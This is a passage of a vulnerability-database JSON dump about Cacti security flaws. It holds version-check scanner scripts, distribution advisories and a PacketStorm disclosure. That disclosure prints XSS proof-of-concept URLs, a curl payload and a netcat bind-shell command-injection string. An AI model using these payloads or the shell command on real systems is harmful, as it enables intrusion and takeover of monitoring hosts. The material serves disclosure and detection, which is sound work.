USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been found in cacti, a frontend to rrdtool\nfor monitoring systems and services. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2007-3112, CVE-2007-3113\n\nIt was discovered that cacti is prone to a denial of service via the\ngraph_height, graph_width, graph_start and graph_end parameters.\nThis issue only affects the oldstable (etch) version of cacti.\n\nCVE-2009-4032\n\nIt was discovered that cacti is prone to several cross-site scripting\nattacks via different vectors.\n\nCVE-2009-4112\n\nIt has been discovered that cacti allows authenticated administrator\nusers to gain access to the host system by executing arbitrary commands\nvia the Data Input Method for the Linux - Get Memory Usage setting.\n\nThere is no fix for this issue at this stage. Upstream will implement a\nwhitelist policy to only allow certain safe commands. For the moment,\nwe recommend that such access is only given to trusted users and that\nthe options Data Input and User Administration are otherwise\ndeactivated.\n\n\nFor the oldstable distribution (etch), these problems have been fixed in\nversion 0.8.6i-3.6.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.8.7b-2.1+lenny1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 0.8.7e-1.1.\n\n\nWe recommend that you upgrade your cacti packages.\";\ntag_summary = \"The remote host is missing an update to cacti\nannounced via advisory DSA 1954-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201954-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66592\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2007-3112\", \"CVE-2007-3113\", \"CVE-2009-4032\", \"CVE-2009-4112\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1954-1 (cacti)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"cacti\", ver:\"0.8.6i-3.6\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cacti\", ver:\"0.8.7b-2.1+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T11:48:51", "bulletinFamily": "scanner", "description": "Check for the Version of cacti", "modified": "2017-12-13T00:00:00", "published": "2010-08-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=831138", "id": "OPENVAS:831138", "title": "Mandriva Update for cacti MDVSA-2010:160 (cacti)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for cacti MDVSA-2010:160 (cacti)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been found and corrected in cacti:\n\n Multiple cross-site scripting (XSS) vulnerabilities in Cacti before\n 0.8.7f, allow remote attackers to inject arbitrary web script or\n HTML via the (1) hostname or (2) description parameter to host.php,\n or (3) the host_id parameter to data_sources.php (CVE-2010-1644).\n\n Cacti before 0.8.7f, allows remote authenticated administrators to\n execute arbitrary commands via shell metacharacters in (1) the FQDN\n field of a Device or (2) the Vertical Label field of a Graph Template\n (CVE-2010-1645).\n\n Cross-site scripting (XSS) vulnerability in\n include/top_graph_header.php in Cacti before 0.8.7g allows remote\n attackers to inject arbitrary web script or HTML via the graph_start\n parameter to graph.php. NOTE: this vulnerability exists because of\n an incorrect fix for CVE-2009-4032.2.b (CVE-2010-2543).\n\n Cross-site scripting (XSS) vulnerability in utilities.php in Cacti\n before 0.8.7g, allows remote attackers to inject arbitrary web script\n or HTML via the filter parameter (CVE-2010-2544).\n\n Multiple cross-site scripting (XSS) vulnerabilities in Cacti before\n 0.8.7g, allow remote attackers to inject arbitrary web script or HTML\n via (1) the name element in an XML template to templates_import.php;\n and allow remote authenticated administrators to inject arbitrary web\n script or HTML via vectors related to (2) cdef.php, (3) data_input.php,\n (4) data_queries.php, (5) data_sources.php, (6) data_templates.php, (7)\n gprint_presets.php, (8) graph.php, (9) graphs_new.php, (10) graphs.php,\n (11) graph_templates_inputs.php, (12) graph_templates_items.php,\n (13) graph_templates.php, (14) graph_view.php, (15) host.php, (16)\n host_templates.php, (17) lib/functions.php, (18) lib/html_form.php,\n (19) lib/html_form_template.php, (20) lib/html.php, (21)\n lib/html_tree.php, (22) lib/rrd.php, (23) rra.php, (24) tree.php,\n and (25) user_admin.php (CVE-2010-2545).\n\n This update provides cacti 0.8.7f, which is not vulnerable to these\n issues.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"cacti on Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-08/msg00021.php\");\n script_id(831138);\n script_version(\"$Revision: 8092 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-13 07:31:16 +0100 (Wed, 13 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-08-30 16:59:25 +0200 (Mon, 30 Aug 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2010:160\");\n script_cve_id(\"CVE-2010-1644\", \"CVE-2010-1645\", \"CVE-2009-4032\", \"CVE-2010-2543\", \"CVE-2010-2544\", \"CVE-2010-2545\");\n script_name(\"Mandriva Update for cacti MDVSA-2010:160 (cacti)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of cacti\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"cacti\", rpm:\"cacti~0.8.7g~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:23", "bulletinFamily": "unix", "description": "\nThe cacti development team reports:\n\nThe Cross-Site Scripting patch has been posted.\nThis patch addresses cross-site scripting issues reported\n\t by Moritz Naumann.\n\n", "modified": "2010-05-02T00:00:00", "published": "2009-11-21T00:00:00", "id": "04104985-D846-11DE-84E4-00215AF774F0", "href": "https://vuxml.freebsd.org/freebsd/04104985-d846-11de-84e4-00215af774f0.html", "title": "cacti -- cross-site scripting issues", "type": "freebsd", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:24", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-27T00:00:00", "published": "2009-11-27T00:00:00", "href": "https://packetstormsecurity.com/files/83264/Cacti-0.8.7e-Cross-Site-Scripting.html", "id": "PACKETSTORM:83264", "type": "packetstorm", "title": "Cacti 0.8.7e Cross Site Scripting", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA512 \n \nCacti 0.8.7e and earlier versions are affected by multiple security \nissues. Issues 1-4 are cross site scripting issues, issue 5 is a \npriviledge escalation issue. \n \n \n \n \n1. XSS 1 \n \nA HTTP GET request against the following URL will, on a web browser \nwith Javascript support, cause a dialog box saying '1' to be displayed: \n \nhttp://CACTIHOST/graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility:hidden%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx%20y=%27 \n \nThis vulnerability is only exploitable if the victim is allowed to view \ngraphs. This will be true if the victim has previously authenticated \nagainst Cacti or if both the guest user has been activated (default: \ndisabled) and the graph view permission was set to 'guest' (default: \n'No User'). \n \nThis vulnerability was tested with Firefox 3.0.6. \n \nThe Cacti group provides a patch to fix this vulnerability: \nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch \n \n \n \n2. XSS 2 \n \nThe following curl invocation will generate a HTTP POST request \nagainst \n \nhttp://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true \n \nwith an 'application/x-www-form-urlencoded' content type HTTP body part \ncontaining \ndate1=%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3Cx+y%3D%27' \nCurl will write the resulting output to a file named poc.html. \n \n> curl -d 'date1=%27%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E%3Cx+y%3D%27' 'http://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true' > poc.html \n \nWhen this file is loaded and rendered by a web browser with Javascript \nsupport, this will cause a dialog box saying '2' to be displayed. \n \nThis vulnerability is only exploitable if the victim is allowed to view \ngraphs. This will be true if the victim has previously authenticated \nagainst Cacti or if both the guest user has been activated (default: \ndisabled) and the graph view permission was set to 'guest' (default: \n'No User'). \n \nThe Cacti group provides a patch to fix this vulnerability: \nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch \n \n \n \n3. XSS 3 \n \nIf an attacker or the victim has permission to modify the graph \ndisplay settings via graph_settings.php, the attacker is able to \npersistently inject javascript code via the 'page_refresh' and \n'default_dual_pane_width' parameters. \n \nSetting 'page_refresh' to the following value will, on any consecutive \nvisitors' web browser with Javascript support, cause a dialog box saying \n'3' to be displayed: \n300'><script>alert(3)</script><x y=' \n \nSetting 'default_dual_pane_width' to the following value will, on any \nconsecutive visitors' web browser with Javascript support, cause a \ndialog box saying '3' to be displayed: \n200\"><script>alert(3)</script><x y=\" \n \nThe Cacti group provides a patch to fix this vulnerability: \nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch \n \n \n \n4. XSS 4 \n \nA HTTP GET request against the following URL will, on a web browser \nwith Javascript support, cause a dialog box saying '4' to be displayed: \n \n> > \nhttp://CACTIHOST/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E \n \nThis vulnerability is only exploitable if the victim is allowed to view \ngraphs. This will be true if the victim has previously authenticated \nagainst Cacti or if both the guest user has been activated (default: \ndisabled) and the graph view permission was set to 'guest' (default: \n'No User'). \n \nAlternatively, a similar injection can be achieved, if an attacker or \nhis victim has permission to modify the graph display settings via \ngraph_settings.php. If so, the attacker is able to persistently inject \njavascript code via the 'title_size', 'legend_size', 'axis_size' and \n'unit_size' parameters. \n \nSetting any of these parameters to the following value will, on any \nconsecutive visitors' web browser with Javascript support, cause a \ndialog box saying '4' to be displayed: \n8</pre><script>alert(4)</script><pre> \n \nThis vulnerability was tested with Firefox 3.0.6 \n \nThe Cacti group provides a patch to fix this vulnerability: \nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch \n \n \n \n5. Priviledge escalation \n \nFinally, due to the permissive way the web interface allows Cacti \nto be configured, a cacti administrator is also able to execute \narbitrary commands on the system as the user the Cacti polling mechanism \nruns as (usually a non-priviledged user). \n \nFor example, it is possible to successfully spawn (and connect to) a \nbackdoor/remote shell on the Cacti system by changing the \"Data Input \nMethod\" for \"Linux - Get Memory Usage\". Setting \"Input String\" to \nnohup nc -l -p 6666 -n -e /bin/sh & \nwould spawn a remotely accessible shell whenever this handler was called \n(every couple of minutes by default on my Debian test system). \n \nCacti developers say: \n> There is no effective way to fix the data input method without breaking Cacti. It will be reviewed for the release of 0.8.8. \n \n \n \nThe XSS issues are currently tracked as CVE-2009-4032 (additional CVEs \nmay or may not be assigned), issue 5 has not been tracked so far (to my \nknowledge). \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.10 (GNU/Linux) \n \niEYEAREKAAYFAksOFWYACgkQn6GkvSd/Bgwb0QCfZu7dWpBE7FSeds0jeFa1NmzN \nq44An3dl2cZgU/LRpZSjYpuqbo2Ukzbe \n=yeNz \n-----END PGP SIGNATURE----- \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/83264/cacti087e-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2019-02-21T01:12:45", "bulletinFamily": "scanner", "description": "The cacti development team reports :\n\nThe Cross-Site Scripting patch has been posted.\n\nThis patch addresses cross-site scripting issues reported by Moritz Naumann.", "modified": "2018-11-21T00:00:00", "id": "FREEBSD_PKG_04104985D84611DE84E400215AF774F0.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=42874", "published": "2009-11-24T00:00:00", "title": "FreeBSD : cacti -- XSS issues (04104985-d846-11de-84e4-00215af774f0)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42874);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/21 10:46:30\");\n\n script_cve_id(\"CVE-2009-4032\");\n\n script_name(english:\"FreeBSD : cacti -- XSS issues (04104985-d846-11de-84e4-00215af774f0)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The cacti development team reports :\n\nThe Cross-Site Scripting patch has been posted.\n\nThis patch addresses cross-site scripting issues reported by Moritz\nNaumann.\"\n );\n # http://docs.cacti.net/#cross-site_scripting_fixes\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://docs.cacti.net/#cross-site_scripting_fixes\"\n );\n # https://vuxml.freebsd.org/freebsd/04104985-d846-11de-84e4-00215af774f0.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?609061dd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cwe_id(79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:cacti\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"cacti<0.8.7e4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-21T01:12:51", "bulletinFamily": "scanner", "description": "This fix contains several official patches from cacti: Command Line Add Graphs Syntax SNMP Invalid Responses Template Import/Export Duplication Cross-Site Scripting Fixes http://www.cacti.net/download_patches.php\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-28T00:00:00", "id": "FEDORA_2009-12575.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=43602", "published": "2009-12-28T00:00:00", "title": "Fedora 11 : cacti-0.8.7e-3.fc11 (2009-12575)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-12575.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43602);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/11/28 22:47:43\");\n\n script_cve_id(\"CVE-2009-4032\");\n script_bugtraq_id(37109);\n script_xref(name:\"FEDORA\", value:\"2009-12575\");\n\n script_name(english:\"Fedora 11 : cacti-0.8.7e-3.fc11 (2009-12575)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This fix contains several official patches from cacti: Command Line\nAdd Graphs Syntax SNMP Invalid Responses Template Import/Export\nDuplication Cross-Site Scripting Fixes\nhttp://www.cacti.net/download_patches.php\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.cacti.net/download_patches.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.cacti.net/download_patches.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=541279\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-December/033199.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?23f97cc2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cacti package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:cacti\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"cacti-0.8.7e-3.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cacti\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-21T01:13:07", "bulletinFamily": "scanner", "description": "This fix contains several official patches from cacti: Command Line Add Graphs Syntax SNMP Invalid Responses Template Import/Export Duplication Cross-Site Scripting Fixes http://www.cacti.net/download_patches.php\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-28T00:00:00", "id": "FEDORA_2009-12560.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44878", "published": "2010-02-25T00:00:00", "title": "Fedora 12 : cacti-0.8.7e-3.fc12 (2009-12560)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-12560.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44878);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/28 22:47:43\");\n\n script_cve_id(\"CVE-2009-4032\");\n script_bugtraq_id(37109);\n script_xref(name:\"FEDORA\", value:\"2009-12560\");\n\n script_name(english:\"Fedora 12 : cacti-0.8.7e-3.fc12 (2009-12560)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This fix contains several official patches from cacti: Command Line\nAdd Graphs Syntax SNMP Invalid Responses Template Import/Export\nDuplication Cross-Site Scripting Fixes\nhttp://www.cacti.net/download_patches.php\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.cacti.net/download_patches.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.cacti.net/download_patches.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=541279\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-January/033489.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?deea97a6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cacti package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:cacti\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^12([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 12.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC12\", 